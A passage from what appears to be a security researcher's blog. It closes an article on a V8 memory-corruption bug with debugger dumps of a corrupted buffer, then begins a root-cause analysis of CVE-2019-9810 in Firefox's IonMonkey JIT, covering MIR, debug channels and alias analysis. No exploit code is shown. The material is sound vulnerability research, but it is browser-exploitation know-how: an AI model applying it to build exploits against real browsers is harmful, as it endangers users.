- backing_store: 0x107314fd0
- byte_length: 64
- detachable
- properties: 0x16a4080406e1 <FixedArray[0]> {}
- embedder fields = {
0, aligned pointer: 0x0
0, aligned pointer: 0x0
}

(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000


We indeed find the full raw pointer in memory (raw | 00).

(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000


# Conclusion

We went through various components of V8 in this article, such as Ignition, TurboFan's simplified lowering phase, and the way deoptimization works. Understanding these is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple, but it actually involves quite a few interesting mechanisms. However, even though this bug gives a very interesting primitive, it unfortunately does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).
Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article, and kudos to the V8 team for building such an amazing JavaScript engine! Please feel free to contact me on twitter if you've got any feedback or question! Also, my team at Trenchant aka Azimuth Security is hiring, so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity)

# References

### Technical documents

### Bugs

# A journey into IonMonkey: root-causing CVE-2019-9810

17 June 2019 at 15:00

## Introduction

In May, I wanted to play with BigInt and evaluate how I could use them for browser exploitation. The exploit I wrote for blazefox relied on a JavaScript library developed by @5aelo that allows code to manipulate 64-bit integers. Around the same time, ZDI released a PoC for CVE-2019-9810, an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own 2019 to compromise Mozilla's web browser. This was the perfect occasion to write an exploit and add BigInt support to my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810.

Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root cause of the issue, and unwinding it sounded like a nice exercise. This is basically what this blogpost is about: me exploring Ion's code base and investigating the root cause of CVE-2019-9810. The title of the issue, "IonMonkey MArraySlice has incorrect alias information", suggests that the root of the issue concerns some alias information, and the fix of the issue also points at Ion's AliasAnalysis optimization pass.
Before starting, if you want to follow the source code at home without downloading the whole of Spidermonkey's / Firefox's source code, I have set up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn, and as a result some of the functions I mention below can appear with a slightly different name in the latest available version.

All right, buckle up and enjoy the read!

## Speculative optimizing JIT compiler

This part is not really meant to introduce what optimizing speculative JIT engines are in detail, but instead to give you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to follow what is to come.

For the people that have never heard about JIT (just-in-time) engines: this is a piece of software that is able to turn managed code into native code as it runs. This has historically been used by interpreted languages to produce faster code, as running assembly is faster than a software CPU running code. With that in mind, this is what the Javascript bytecode looks like in Spidermonkey:

js> function f(a, b) { return a+b; }
js> dis(f)
flags: CONSTRUCTOR
loc     op
-----   --
main:
00000:  getarg 0                        #
00003:  getarg 1                        #
00006:  add                             #
00007:  return                          #
00008:  retrval                         # !!! UNREACHABLE !!!

Source notes:
 ofs line    pc  delta desc     args
---- ---- ----- ------ -------- ------
  0:    1     0 [   0] colspan 19
  2:    1     0 [   0] step-sep
  3:    1     0 [   0] breakpoint
  4:    1     7 [   7] colspan 12
  6:    1     8 [   1] breakpoint


Now, generating assembly is one thing, but the JIT engine can be more advanced and apply a bunch of program analyses to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else.
Well, the JIT engine might be able to prove that it is safe not to do any bounds check on the index, in which case it can remove it. Another easy example to reason about is an object getting constructed in a loop body while not depending on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, why construct it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function as above:

0:000> u . l20
000003add5d09231 cc                   int 3
000003add5d09232 8b442428             mov eax,dword ptr [rsp+28h]
000003add5d09236 8b4c2430             mov ecx,dword ptr [rsp+30h]
000003add5d0923a 03c1                 add eax,ecx
000003add5d0923c 0f802f000000         jo 000003add5d09271
000003add5d09242 48b9000000000080f8ff mov rcx,0FFF8800000000000h
000003add5d0924c 480bc8               or rcx,rax
000003add5d0924f c3                   ret
000003add5d09271 2bc1                 sub eax,ecx
000003add5d09273 e900000000           jmp 000003add5d09278
000003add5d09278 6a0d                 push 0Dh
000003add5d0927a e900000000           jmp 000003add5d0927f
000003add5d0927f 6a00                 push 0
000003add5d09281 e99a6effff           jmp 000003add5d00120 <- bailout


OK, so this was for the optimizing part of the JIT compiler, but what about the speculative part? If you think about it for a minute or two, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the objects you are dealing with, and this information is hard to get in dynamically typed languages because, by design, the type of a variable changes across the program execution. Now, obviously the engine cannot randomly speculate about types; instead, what engines usually do is introspect the program at runtime and observe what is going on.
If this function has been invoked many times and every time it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function, it is going to insert a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together, for example. So if the engine encounters a case where the speculation it made doesn't hold anymore, it can toss the code it generated and fall back to executing the code in the interpreter (this is called a deoptimization bailout), resulting in a performance hit.

As you can imagine, the process of analyzing the program as well as running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you executed a function let's say a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to distinguish hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).

// Force how many invocation or loop iterations are needed before compiling
// a function with the highest ionmonkey optimization level.
// (i.e. OptimizationLevel_Normal)
const char* forcedDefaultIonWarmUpThresholdEnv =
    "JIT_OPTION_forcedDefaultIonWarmUpThreshold";
if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) {
  Maybe<int> value = ParseInt(env);
  if (value.isSome()) {
    forcedDefaultIonWarmUpThreshold.emplace(value.ref());
  } else {
    Warn(forcedDefaultIonWarmUpThresholdEnv, env);
  }
}

// From the Javascript shell source-code
int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold");
if (warmUpThreshold >= 0) {
  jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold);
}


On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses on Ion, which is the fastest/most expensive tier of JIT in Spidermonkey. Here is an overview of the whole pipeline (picture taken from Mozilla's wiki):

OK, so in Spidermonkey the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion, and Ion converts it to another representation, the Middle-level Intermediate Representation (abbreviated MIR later). This is a pretty simple IR which uses Static Single Assignment and has about ~300 instructions. The MIR instructions are organized in basic blocks and themselves form a control-flow graph. Ion's optimization pipeline is composed of 29 steps: certain steps actually modify the MIR graph by removing or shuffling nodes, and others don't modify it at all (they just analyze it and produce results consumed by later passes).
To debug Ion, I recommend adding the below to your mozconfig file:

ac_add_options --enable-jitspew


This basically turns on a bunch of macros in the Spidermonkey code-base that are used to spew debugging information on the standard output. The debugging infrastructure is not nearly as nice as Turbolizer, but we will do with the tools we have. The JIT subsystem defines a number of channels where it can output spew, and the user can turn any of them on or off. This is pretty useful if you want to debug a single optimization pass for example.

// New channels may be added below.
#define JITSPEW_CHANNEL_LIST(_)          \
/* Information during sinking */         \
_(Prune)                                 \
/* Information during escape analysis */ \
_(Escape)                                \
/* Information during alias analysis */  \
_(Alias)                                 \
/* Information during alias analysis */  \
_(AliasSummaries)                        \
/* Information during GVN */             \
_(GVN)                                   \
/* Information during sincos */          \
_(Sincos)                                \
/* Information during sinking */         \
_(Sink)                                  \
/* Information during Range analysis */  \
_(Range)                                 \
/* Information during LICM */            \
_(LICM)                                  \
/* Info about fold linear constants */   \
_(FLAC)                                  \
/* Effective address analysis info */    \
_(EAA)                                   \
/* Information during regalloc */        \
_(RegAlloc)                              \
/* Information during inlining */        \
_(Inlining)                              \
/* Information during codegen */         \
_(Codegen)                               \
/* Debug info about safepoints */        \
_(Safepoints)                            \
/* Debug info about Pools*/              \
_(Pools)                                 \
/* Profiling-related information */      \
_(Profiling)                             \
/* Information of tracked opt strats */  \
_(OptimizationTracking)                  \
_(OptimizationTrackingExtended)          \
/* Debug info about the I$ */            \
_(CacheFlush)                            \
/* Output a list of MIR expressions */   \
_(MIRExpressions)                        \
/* Print control flow graph */           \
_(CFG)                                   \
\
/* BASELINE COMPILER SPEW */             \
\
/* Aborting Script Compilation. */       \
_(BaselineAbort)                         \
/* Script Compilation. */                \
_(BaselineScripts)                       \
/* Detailed op-specific spew. */         \
_(BaselineOp)                            \
/* Inline caches. */                     \
_(BaselineIC)                            \
/* Inline cache fallbacks. */            \
_(BaselineICFallback)                    \
/* OSR from Baseline => Ion. */          \
_(BaselineOSR)                           \
/* Bailouts. */                          \
_(BaselineBailouts)                      \
/* Debug Mode On Stack Recompile . */    \
_(BaselineDebugModeOSR)                  \
\
/* ION COMPILER SPEW */                  \
\
/* Used to abort SSA construction */     \
_(IonAbort)                              \
/* Information about compiled scripts */ \
_(IonScripts)                            \
/* Info about failing to log script */   \
_(IonSyncLogs)                           \
/* Information during MIR building */    \
_(IonMIR)                                \
/* Information during bailouts */        \
_(IonBailouts)                           \
/* Information during OSI */             \
_(IonInvalidate)                         \
/* Debug info about snapshots */         \
_(IonSnapshots)                          \
/* Generated inline cache stubs */       \
_(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
  JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
  JitSpew_Terminator
};


In order to turn those channels on, you need to define an environment variable called IONFLAGS containing a comma-separated list of all the channels you want turned on: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don't quite match the macros above, so you can find all the names below:
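For example, assuming a jitspew-enabled debug build of the JS shell (the build path below is illustrative, adjust it to your own tree), a typical invocation looks like this:

```shell
# Illustrative invocation -- point at your own --enable-jitspew build of the shell.
IONFLAGS=alias,alias-sum,logs ./obj-debug/dist/bin/js poc.js
```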

static void PrintHelpAndExit(int status = 0) {
fflush(nullptr);
printf(
"\n"
"usage: IONFLAGS=option,option,option,... where options can be:\n"
"\n"
"  aborts        Compilation abort messages\n"
"  scripts       Compiled scripts\n"
"  mir           MIR information\n"
"  prune         Prune unused branches\n"
"  escape        Escape analysis\n"
"  alias         Alias analysis\n"
"  alias-sum     Alias analysis: shows summaries for every block\n"
"  gvn           Global Value Numbering\n"
"  licm          Loop invariant code motion\n"
"  flac          Fold linear arithmetic constants\n"
"  sincos        Replace sin/cos by sincos\n"
"  sink          Sink transformation\n"
"  regalloc      Register allocation\n"
"  inline        Inlining\n"
"  snapshots     Snapshot information\n"
"  codegen       Native code generation\n"
"  bailouts      Bailouts\n"
"  caches        Inline caches\n"
"  osi           Invalidation\n"
"  safepoints    Safepoints\n"
"  pools         Literal Pools (ARM only for now)\n"
"  cacheflush    Instruction Cache flushes (ARM only for now)\n"
"  range         Range Analysis\n"
"  logs          JSON visualization logging\n"
"  logs-sync     Same as logs, but flushes between each pass (sync. "
"compiled functions only).\n"
"  profiling     Profiling-related information\n"
"  trackopts     Optimization tracking information gathered by the "
"Gecko profiler. "
"(Note: call enableGeckoProfiling() in your script to enable it).\n"
"  trackopts-ext Encoding information about optimization tracking\n"
"  dump-mir-expr Dump the MIR expressions\n"
"  cfg           Control flow graph generation\n"
"  all           Everything\n"
"\n"
"  bl-aborts     Baseline compiler abort messages\n"
"  bl-scripts    Baseline script-compilation\n"
"  bl-op         Baseline compiler detailed op-specific messages\n"
"  bl-ic         Baseline inline-cache messages\n"
"  bl-ic-fb      Baseline IC fallback stub messages\n"
"  bl-osr        Baseline IC OSR messages\n"
"  bl-bails      Baseline bailouts\n"
"  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
"  bl-all        All baseline spew\n"
"\n"
"\n");
exit(status);
}


An important channel is logs, which tells the compiler to output an ion.json file (in /tmp on Linux) that packs a ton of information gathered throughout the optimization pipeline. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py, but I personally use ghetto-iongraph.py to directly render the graphviz graph as SVG in the browser, whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the passes directly from the browser, which I find more convenient than navigating through a bunch of PNG files:

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite


Reading MIR code is not too bad, you just have to know a few things:

1. Every instruction is an object.
2. Every instruction is identified by an identifier, an integer starting from 0.
3. Each instruction can have operands that are the results of previous instructions:

10 | add unbox8:Int32 unbox9:Int32 [int32]

4. There are no variable names; to reference the result of a previous instruction, a name is created by concatenating the name of the instruction with its identifier, like unbox8 and unbox9 above. Those two names reference the two unbox instructions identified by 8 and 9:

08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)
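The naming scheme above can be modeled with a few lines of JavaScript (an illustrative toy, not real engine code):

```javascript
// Each MIR instruction has an integer id; "unbox8" simply means "the unbox
// instruction whose id is 8". Operands are references to other instructions.
class MirInstruction {
  constructor(id, opcode, operands = []) {
    this.id = id;
    this.opcode = opcode;
    this.operands = operands; // other MirInstruction objects
  }
  // The printable name is the opcode concatenated with the id.
  get name() { return `${this.opcode}${this.id}`; }
  toString() {
    const ops = this.operands.map(o => o.name).join(" ");
    return `${String(this.id).padStart(2, "0")} | ${this.opcode} ${ops}`.trim();
  }
}

const unbox8 = new MirInstruction(8, "unbox");
const unbox9 = new MirInstruction(9, "unbox");
const add10 = new MirInstruction(10, "add", [unbox8, unbox9]);
console.log(add10.toString()); // → "10 | add unbox8 unbox9"
```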


That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engine but the concepts are usually the same):

• JavaScriptCore, powering Safari

• Chakra, powering Microsoft Edge: Architecture overview

Let's have a look at alias analysis now :)

### Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass which is the specific optimization pass that has been fixed by Mozilla. To understand it a bit more we will simply take small snippets of Javascript, observe the results in a debugger as well as following the source-code along. We will get back to the vulnerability a bit later when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
    const a = [1,2,3,4];
    a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
    x();
}


Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


The alias analysis is able to output a summary on the alias-sum channel, and this is what it prints out when run against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29


OK, so that's kind of a lot for now, so let's start at the beginning. Ion uses what they call alias sets. You can see an alias set as an equivalence set (a term also used in the compiler literature): everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that's all it cares about. Alias information is used later in the pipeline to carry out optimizations such as redundancy elimination, for example; more on that later.
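A minimal model of the idea, as a sketch (illustrative only; the real flags and AliasSet class live in js/src/jit/MIR.h): an alias set is a bitset of memory categories plus a load/store direction, and two sets can only alias when their category bits intersect.

```javascript
// Toy alias sets: a few made-up category bits and Load/Store constructors.
const Flag = { Element: 1 << 0, ObjectFields: 1 << 1, FixedSlot: 1 << 2 };
const Load = flags => ({ store: false, flags });
const Store = flags => ({ store: true, flags });

// Two sets "intersect" when they share at least one category bit.
const intersects = (a, b) => (a.flags & b.flags) !== 0;

const elementsLoad = Load(Flag.ObjectFields); // like MElements
const setInitLen = Store(Flag.ObjectFields);  // like MSetInitializedLength
const storeElem = Store(Flag.Element);        // like MStoreElement

console.log(intersects(elementsLoad, setInitLen)); // → true: may alias
console.log(intersects(elementsLoad, storeElem));  // → false: cannot alias
```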

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.


In Ion, instructions are free to refine their alias set by overloading getAliasSet; here are the alias sets defined for the different MIR opcodes we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
// NewArray is marked as non-effectful because all our allocations are
// either lazy when we are using "new Array(length)" or bounded by the
// script or the stack size when we are using "new Array(...)" or "[...]"
// notations.  So we might have to allocate the array twice if we bail
// during the computation of the first element of the square braket
// notation.
virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store a value to a dense array slots vector.
class MStoreElement
: public MTernaryInstruction,
public MStoreElementCommon,
public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element);
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};

class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
UnboxedInt32Policy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
}
};


The analyze function ignores instructions that are associated with no alias set, as you can see below..:

for (MInstructionIterator def(block->begin()),
         end(block->begin(block->lastIns()));
     def != end; ++def) {
  def->setId(newId++);
  AliasSet set = def->getAliasSet();
  if (set.isNone()) {
    continue;
  }


..so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) depending on their alias set; for example, if we run the analysis on the code above this is what the vectors would look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]


This reads as: instructions 13, 18, 23, 28 and 35 are store instructions in the AliasSet::Element alias set. Note that instruction 35 not only aliases AliasSet::Element but also AliasSet::ObjectFields.

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction against the current store candidate (note that there is no need to walk the stores[AliasSet::Element] vector if the load instruction does not even alias AliasSet::Element).

To establish a dependency link, the two instructions obviously don't only need to have alias sets that intersect (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operand of the instruction (the one that references the object it is loading from / storing to), and objectsIntersect to do what its name suggests. The MayAlias analysis does two things:

1. Check if the two instructions have intersecting alias sets:
   • AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element) for example.
2. Check if these instructions operate on intersecting TypeSets:
   • GetObject is used to grab the appropriate operand off the instruction,
   • Then get its TypeSet,
   • And compute the intersection with objectsIntersect.
// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    case MDefinition::Opcode::InitializedLength:
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
    // [...]
  }

  object = MaybeUnwrap(object);
  return object;
}

// Generic comparing if a load aliases a store using TI information.
MDefinition::AliasType AliasAnalysis::genericMightAlias(
    const MDefinition* load, const MDefinition* store) {
  const MDefinition* loadObject = GetObject(load);
  const MDefinition* storeObject = GetObject(store);
  if (!loadObject || !storeObject) {
    return MDefinition::AliasType::MayAlias;
  }

  if (!loadObject->resultTypeSet() || !storeObject->resultTypeSet()) {
    return MDefinition::AliasType::MayAlias;
  }

  if (loadObject->resultTypeSet()->objectsIntersect(
          storeObject->resultTypeSet())) {
    return MDefinition::AliasType::MayAlias;
  }

  return MDefinition::AliasType::NoAlias;
}


Now, let's try to walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already run for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (which has a Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]


The next step of the algorithm now is to figure out if the current load is depending on a prior store. If it does, a dependency link is created between the two; if it doesn't it carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course it doesn't go through every vector, but only the ones that intersect with the alias set of the load instruction (there is no point in carrying on if we already know off the bat that they don't even intersect).

In our case, the 17 | elements newarray9:Object can only alias with a store coming from stores[AliasSet::ObjectFields], and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes even have anything related to each other. Keep in mind that those nodes are instructions with operands and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}


Once it has the operand, it goes through one last step to potentially unwrap the operand until finding the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
  while (object->isSlots() || object->isElements() ||
         object->isConvertElementsToDoubles()) {
    MOZ_ASSERT(object->numOperands() == 1);
    object = object->getOperand(0);
  }
  if (object->isTypedArrayElements()) {
    return nullptr;
  }
  if (object->isTypedObjectElements()) {
    return nullptr;
  }
  if (object->isConstantElements()) {
    return nullptr;
  }
  return object;
}


In our case newarray9:Object doesn't need any unwrapping as it is neither an MSlots / MElements / MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first operand elements12, which isn't the actual 'root' object. This is where MaybeUnwrap is useful: it grabs for us the first operand of 12 | elements newarray9:Object, which is newarray9, the root object. Cool.
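The unwrapping behavior can be sketched in a few lines of JavaScript (a toy mirror of MaybeUnwrap, not real engine code): peel `elements`/`slots` wrappers until we reach the underlying object.

```javascript
// Toy MIR nodes: elements12 wraps newarray9, as in the running example.
const newarray9 = { op: "newarray", operands: [] };
const elements12 = { op: "elements", operands: [newarray9] };

function maybeUnwrap(def) {
  // An elements/slots node has a single operand: the object it was taken from.
  while (def.op === "elements" || def.op === "slots") {
    def = def.operands[0];
  }
  return def;
}

console.log(maybeUnwrap(elements12) === newarray9); // → true
console.log(maybeUnwrap(newarray9) === newarray9);  // → true: already the root
```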

Anyways, once we have our two objects, loadObject and storeObject, we need to figure out if they are related. To do that, Ion uses a structure called js::TemporaryTypeSet. My understanding is that a TypeSet completely describes the values that a particular lvalue might have.

/*
* [SMDOC] Type-Inference TypeSet
*
* Information about the set of types associated with an lvalue. There are
* three kinds of type sets:
*
* - StackTypeSet are associated with TypeScripts, for arguments and values
*   observed at property reads. These are implicitly frozen on compilation
*   and only have constraints added to them which can trigger invalidation of
*   TypeNewScript information.
*
* - HeapTypeSet are associated with the properties of ObjectGroups. These
*   may have constraints added to them to trigger invalidation of either
*   compiled code or TypeNewScript information.
*
* - TemporaryTypeSet are created during compilation and do not outlive
*   that compilation.
*
* The contents of a type set completely describe the values that a particular
* lvalue might have, except for the following cases:
*
* - If an object's prototype or class is dynamically mutated, its group will
*   change. Type sets containing the old group will not necessarily contain
*   the new group. When this occurs, the properties of the old and new group
*   will both be marked as unknown, which will prevent Ion from optimizing
*   based on the object's type information.
*
* - If an unboxed object is converted to a native object, its group will also
*   change and type sets containing the old group will not necessarily contain
*   the new group. Unlike the above case, this will not degrade property type
*   information, but Ion will no longer optimize unboxed objects with the old
*   group.
*/


As a reminder, in our case we have newarray9:Object as loadObject (extracted from 17 | elements newarray9:Object) and newarray9:Object as storeObject (extracted from 14 | setinitializedlength elements12:Elements constant11:Int32, the store candidate). Their TypeSets intersect (they are the same one), and as a result genericMightAlias returns AliasType::MayAlias.

If genericMightAlias returns MayAlias, the caller AliasAnalysis::analyze invokes the method mightAlias on the def variable, which is the load instruction. This is a virtual method that instructions can override, in which case they get a chance to specify a more precise behavior there.

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

virtual AliasType mightAlias(const MDefinition* store) const {
  // Return whether this load may depend on the specified store, given
  // that the alias sets intersect. This may be refined to exclude
  // possible aliasing in cases where alias set flags are too imprecise.
  if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
    return AliasType::NoAlias;
  }
  MOZ_ASSERT(!isEffectful() && store->isEffectful());
  return AliasType::MayAlias;
}


As a reminder, in our case the load instruction has the alias set Load(AliasSet::ObjectFields), and the store instruction has the alias set Store(AliasSet::ObjectFields), as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};


We are nearly done, but the algorithm doesn't quite end just yet. It keeps iterating through the store candidates, as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not just any store, as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
